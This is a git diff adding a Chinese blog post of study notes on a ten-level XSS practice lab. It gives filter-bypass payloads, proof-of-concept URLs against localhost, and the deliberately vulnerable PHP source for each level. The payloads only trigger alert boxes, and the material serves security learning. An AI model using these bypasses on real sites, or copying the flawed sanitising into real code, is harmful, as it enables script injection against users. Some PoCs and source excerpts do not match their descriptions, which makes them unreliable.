--- a/_posts/2020-9-14-xss靶场.md
+++ b/_posts/2020-9-14-xss靶场.md
@@ -11,3 +11,256 @@ tags:
      - 网络安全
      - XSS
 ---
+
+# xss通关小游戏学习笔记
+
+### level1
+
+- 方法：输入`<script>alert(1)</script>`，直接弹窗，没有做任何过滤。
+
+- poc:`http://127.0.0.1/xss/level1.php?name=<script>alert(1)</script>`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["name"];
+  echo "<h2 align=center>欢迎用户".$str."</h2>";
+  ?>
+  ```
+
+### level2
+
+- 方法：输入`<sCripT '	 "+oOn>`，发现页面直接把输入的代码显示出来，右键查看源代码，发现输入的`<`、`>`、`'`都被转化成HTML实体了（`&lt;`这种），但是`"`却在输入框那里和源代码已有的`"`组合在一起，形成了闭合。所以，继续输入`" onclick = "alert(1)`，出现弹窗。
+
+- poc:`http://127.0.0.1/xss/level2.php?keyword=%22+onclick+%3D+%22alert%281%29&submit=%E6%90%9C%E7%B4%A2`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form action=level2.php method=GET>
+  <input name=keyword  value="'.$str.'">
+  <input type=submit name=submit value="搜索"/>
+  </form>
+  </center>';
+  ?>
+  ```
+
+### level3
+
+- 方法：输入`<sCripT ' "	 oOn>`，发现页面直接把输入的代码显示出来，右键查看源代码，发现输入的`<`、`>`、`'`都被转化成HTML实体了（`&lt;`这种），但是`''`却在输入框那里和源代码已有的`'`组合在一起，形成了闭合。所以，继续输入' onclick = 'alert(1)`，出现弹窗。
+
+- poc：`http://127.0.0.1/xss/level3.php?keyword=%27+onclick%3D%27alert%281%29&submit=%E6%90%9C%E7%B4%A2`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
+  <form action=level3.php method=GET>
+  <input name=keyword  value='".htmlspecialchars($str)."'>
+  <input type=submit name=submit value=搜索 />
+  </form>
+  </center>";
+  ?>
+  ```
+
+### level4
+
+- 方法：输入`<sCripT '	 "+oOn>`，发现页面直接把输入的代码显示出来，右键查看源代码，发现输入的`<`、`>`、`'`都被转化成HTML实体了（`&lt;`这种），但是`"`却在输入框那里和源代码已有的`"`组合在一起，形成了闭合。所以，继续输入`" onclick = "alert(1)`，出现弹窗。
+
+- poc:`http://127.0.0.1/xss/level2.php?keyword=%22+onclick+%3D+%22alert%281%29&submit=%E6%90%9C%E7%B4%A2`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  $str2=str_replace(">","",$str);
+  $str3=str_replace("<","",$str2);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form action=level4.php method=GET>
+  <input name=keyword  value="'.$str3.'">
+  <input type=submit name=submit value=搜索 />
+  </form>
+  </center>';
+  ?>
+  ```
+
+### level5
+
+- 方法：输入`<sCripT '	 "+oOn>`，发现页面直接把输入的代码显示出来，而且输入的`oOn`变成了`oon`，说明进行了大小写转化；输入框后面出现`">`，说明我们成功的把`input`框闭合了；右键查看源代码，发现输入的`<`、`>`、`'`都被转化成HTML实体了（`&lt;`这种），但是`"`却在输入框那里和源代码已有的`"`组合在一起，形成了闭合，而且所输入进去的`script`、`on`都在中间插入了`_`。所以，继续输入`" > < a href="javascript:alert(1)">click me </a>`，出现弹窗。
+
+- poc:`http://127.0.0.1/xss/level5.php?keyword=%22%3E%3Ca+href+%3D+%22javascript%3Aalert%281%29%22%3E111%3C%2Fa%3E&submit=%E6%90%9C%E7%B4%A2`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = strtolower($_GET["keyword"]);
+  $str2=str_replace("<script","<scr_ipt",$str);
+  $str3=str_replace("on","o_n",$str2);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form action=level5.php method=GET>
+  <input name=keyword  value="'.$str3.'">
+  <input type=submit name=submit value=搜索 />
+  </form>
+  </center>';
+  ?>
+  ```
+
+### level6
+
+- 方法：输入`<sCripT '	 "+oOn>`，发现页面直接把输入的代码显示出来，而且输入的`oOn`没有发生变化，说明没有开启大小写转化；输入框后面出现`">`，说明我们成功的把`input`框闭合了；右键查看源代码，发现输入的`<`、`>`、`'`都被转化成HTML实体了（`&lt;`这种），但是`"`却在输入框那里和源代码已有的`"`组合在一起，形成了闭合。所以，继续输入`" Onclick = "alert(1)`或者`"><img sRc = '1' Onerror = "alert(1)"/>`，出现弹窗。
+
+- poc:`http://127.0.0.1/xss/level6.php?keyword=%22%3E%3Cimg+sRc+%3D+%271%27+Onerror+%3D+%22alert%281%29%22%2F%3E&submit=%E6%90%9C%E7%B4%A2`或者`http://127.0.0.1/xss/level6.php?keyword=%22+Onclick+%3D+%22alert%281%29&submit=%E6%90%9C%E7%B4%A2`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  $str2=str_replace("<script","<scr_ipt",$str);
+  $str3=str_replace("on","o_n",$str2);
+  $str4=str_replace("src","sr_c",$str3);
+  $str5=str_replace("data","da_ta",$str4);
+  $str6=str_replace("href","hr_ef",$str5);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form action=level6.php method=GET>
+  <input name=keyword  value="'.$str6.'">
+  <input type=submit name=submit value=搜索 />
+  </form>
+  </center>';
+  ?>
+  ```
+
+### level7
+
+- 方法：输入`<sCripT '	 "+oOn>`，发现页面直接把输入的代码显示出来，而且输入的`oOn`变成了`oon`，说明进行了大小写转化；输入框后面出现`">`，说明我们成功的把`input`框闭合了；右键查看源代码，发现输入的`<`、`>`、`'`都被转化成HTML实体了（`&lt;`这种），但是`"`却在输入框那里和源代码已有的`"`组合在一起，形成了闭合，而且所输入进去的`script`、`on`都消失了。所以，继续输入`" ><scriscriptpt>alert(1)</scriscriptpt>`，出现弹窗。
+
+- poc:`http://127.0.0.1/xss/level7.php?keyword=%22%3E%3Cscscriptript%3Ealert%281%29%3C%2Fscriscriptpt%3E&submit=%E6%90%9C%E7%B4%A2`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str =strtolower( $_GET["keyword"]);
+  $str2=str_replace("script","",$str);
+  $str3=str_replace("on","",$str2);
+  $str4=str_replace("src","",$str3);
+  $str5=str_replace("data","",$str4);
+  $str6=str_replace("href","",$str5);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form action=level7.php method=GET>
+  <input name=keyword  value="'.$str6.'">
+  <input type=submit name=submit value=搜索 />
+  </form>
+  </center>';
+  ?>
+  ```
+
+### level8
+
+- 方法：输入`<sCripT '	 "+oOn>`，发现输入框直接把输入的代码显示出来，而且输入的`oOn`变成了`oon`，说明进行了大小写转化；右键查看源代码，发现输入框中的`<`、`>`、`'`和超链接中的`"`都被转化成HTML实体了（`&lt;`这种），而且所输入进去的`script`变成了`scr_ipt`。所以，尝试HTML编码转化，输入`&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;`，出现弹窗。
+
+- poc:`http://127.0.0.1/xss/level8.php?keyword=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&submit=%E6%90%9C%E7%B4%A2`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = strtolower($_GET["keyword"]);
+  $str2=str_replace("script","scr_ipt",$str);
+  $str3=str_replace("on","o_n",$str2);
+  $str4=str_replace("src","sr_c",$str3);
+  $str5=str_replace("data","da_ta",$str4);
+  $str6=str_replace("href","hr_ef",$str5);
+  $str7=str_replace('"','&quot',$str6);
+  echo '<center>
+  <form action=level8.php method=GET>
+  <input name=keyword  value="'.htmlspecialchars($str).'">
+  <input type=submit name=submit value=添加友情链接 />
+  </form>
+  </center>';
+  ?>
+  ```
+
+
+### level9
+
+- 方法：输入`http://www.baidu.com`，发现输入框直接把输入的代码显示出来，右键查看源代码，输入的内容正常显示；再次输入`javascript:alert(1)`发现输入框中的内容正常显示，超链接中显示`您的链接不合法？有没有！`,再次输入`javascript:alert('http://www.baidu.com')`，右键查看源代码，发现超链接中的`script`被替换成`scr_ipt`。所以，尝试对`script`HTML编码转化，输入`java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://www.baidu.com')`，出现弹窗。
+
+- poc:`http://127.0.0.1/xss/level9.php?keyword=java%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%3Aalert%28%27http%3A%2F%2Fwww.baidu.com%27%29&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = strtolower($_GET["keyword"]);
+  $str2=str_replace("script","scr_ipt",$str);
+  $str3=str_replace("on","o_n",$str2);
+  $str4=str_replace("src","sr_c",$str3);
+  $str5=str_replace("data","da_ta",$str4);
+  $str6=str_replace("href","hr_ef",$str5);
+  $str7=str_replace('"','&quot',$str6);
+  echo '<center>
+  <form action=level9.php method=GET>
+  <input name=keyword  value="'.htmlspecialchars($str).'">
+  <input type=submit name=submit value=添加友情链接 />
+  </form>
+  </center>';
+  ?>
+  <?php
+  if(false===strpos($str7,'http://'))
+  {
+    echo '<center><BR><a href="您的链接不合法？有没有！">友情链接</a></center>';
+          }
+  else
+  {
+    echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
+  }
+  ?>
+  ```
+
+  
+
+### level10
+
+- 方法：在url处输入`keyword=<sCripT ' "+oOn>`，发现页面输入的代码显示出来，右键查看源代码，输入的特殊字符都被实体化了，发现有三个隐藏框；再次输入`keyword=<sCripT ' "+oOn>&t_link=<sCripT ' "+oOn>&t_history=<sCripT ' "+oOn>&t_sort=<sCripT ' "+oOn>`右键查看源代码,发现`name=t_sort`的`value`有回显，经过观察，发现`<>`都被过滤了，而`'`和`"`没有被过滤，再次输入`keyword=<sCripT ' "+oOn>&t_link=<sCripT ' "+oOn>&t_history=<sCripT ' "+oOn>&t_sort=" accesskey="x" onclick="alert('1')`，右键查看源代码，发现隐藏框闭合正常，在firefox浏览器下使用`shift+alt+x`快捷键，出现弹窗**（适用于type=hidden写在value="注入点"的前面的情形）**。或者输入`keyword=<sCripT ' "+oOn>&t_link=<sCripT ' "+oOn>&t_history=<sCripT ' "+oOn>&t_sort=" type="" onclick="alert('1')`，自己构造`type`属性覆盖原有的。**（在标签中，前面的属性声明会覆盖后面的属性声明）**
+
+- poc:`http://127.0.0.1/xss/level10.php?keyword=%3CsCripT%20%27%20%22+oOn%3E&t_link=%3CsCripT%20%27%20%22+oOn%3E&t_history=%3CsCripT%20%27%20%22+oOn%3E&t_sort=%22%20accesskey=%22x%22%20onclick=%22alert(%271%27)`或者`http://127.0.0.1/xss/level10.php?keyword=%3CsCripT%20%27%20%22+oOn%3E&t_link=%3CsCripT%20%27%20%22+oOn%3E&t_history=%3CsCripT%20%27%20%22+oOn%3E&t_sort=%22%20type=%22%22%20onclick=%22alert(%271%27)`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  $str11 = $_GET["t_sort"];
+  $str22=str_replace(">","",$str11);
+  $str33=str_replace("<","",$str22);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form id=search>
+  <input name="t_link"  value="'.'" type="hidden">
+  <input name="t_history"  value="'.'" type="hidden">
+  <input name="t_sort"  value="'.$str33.'" type="hidden">
+  </form>
+  </center>';
+  ?>	
+  ```
+
+  
+
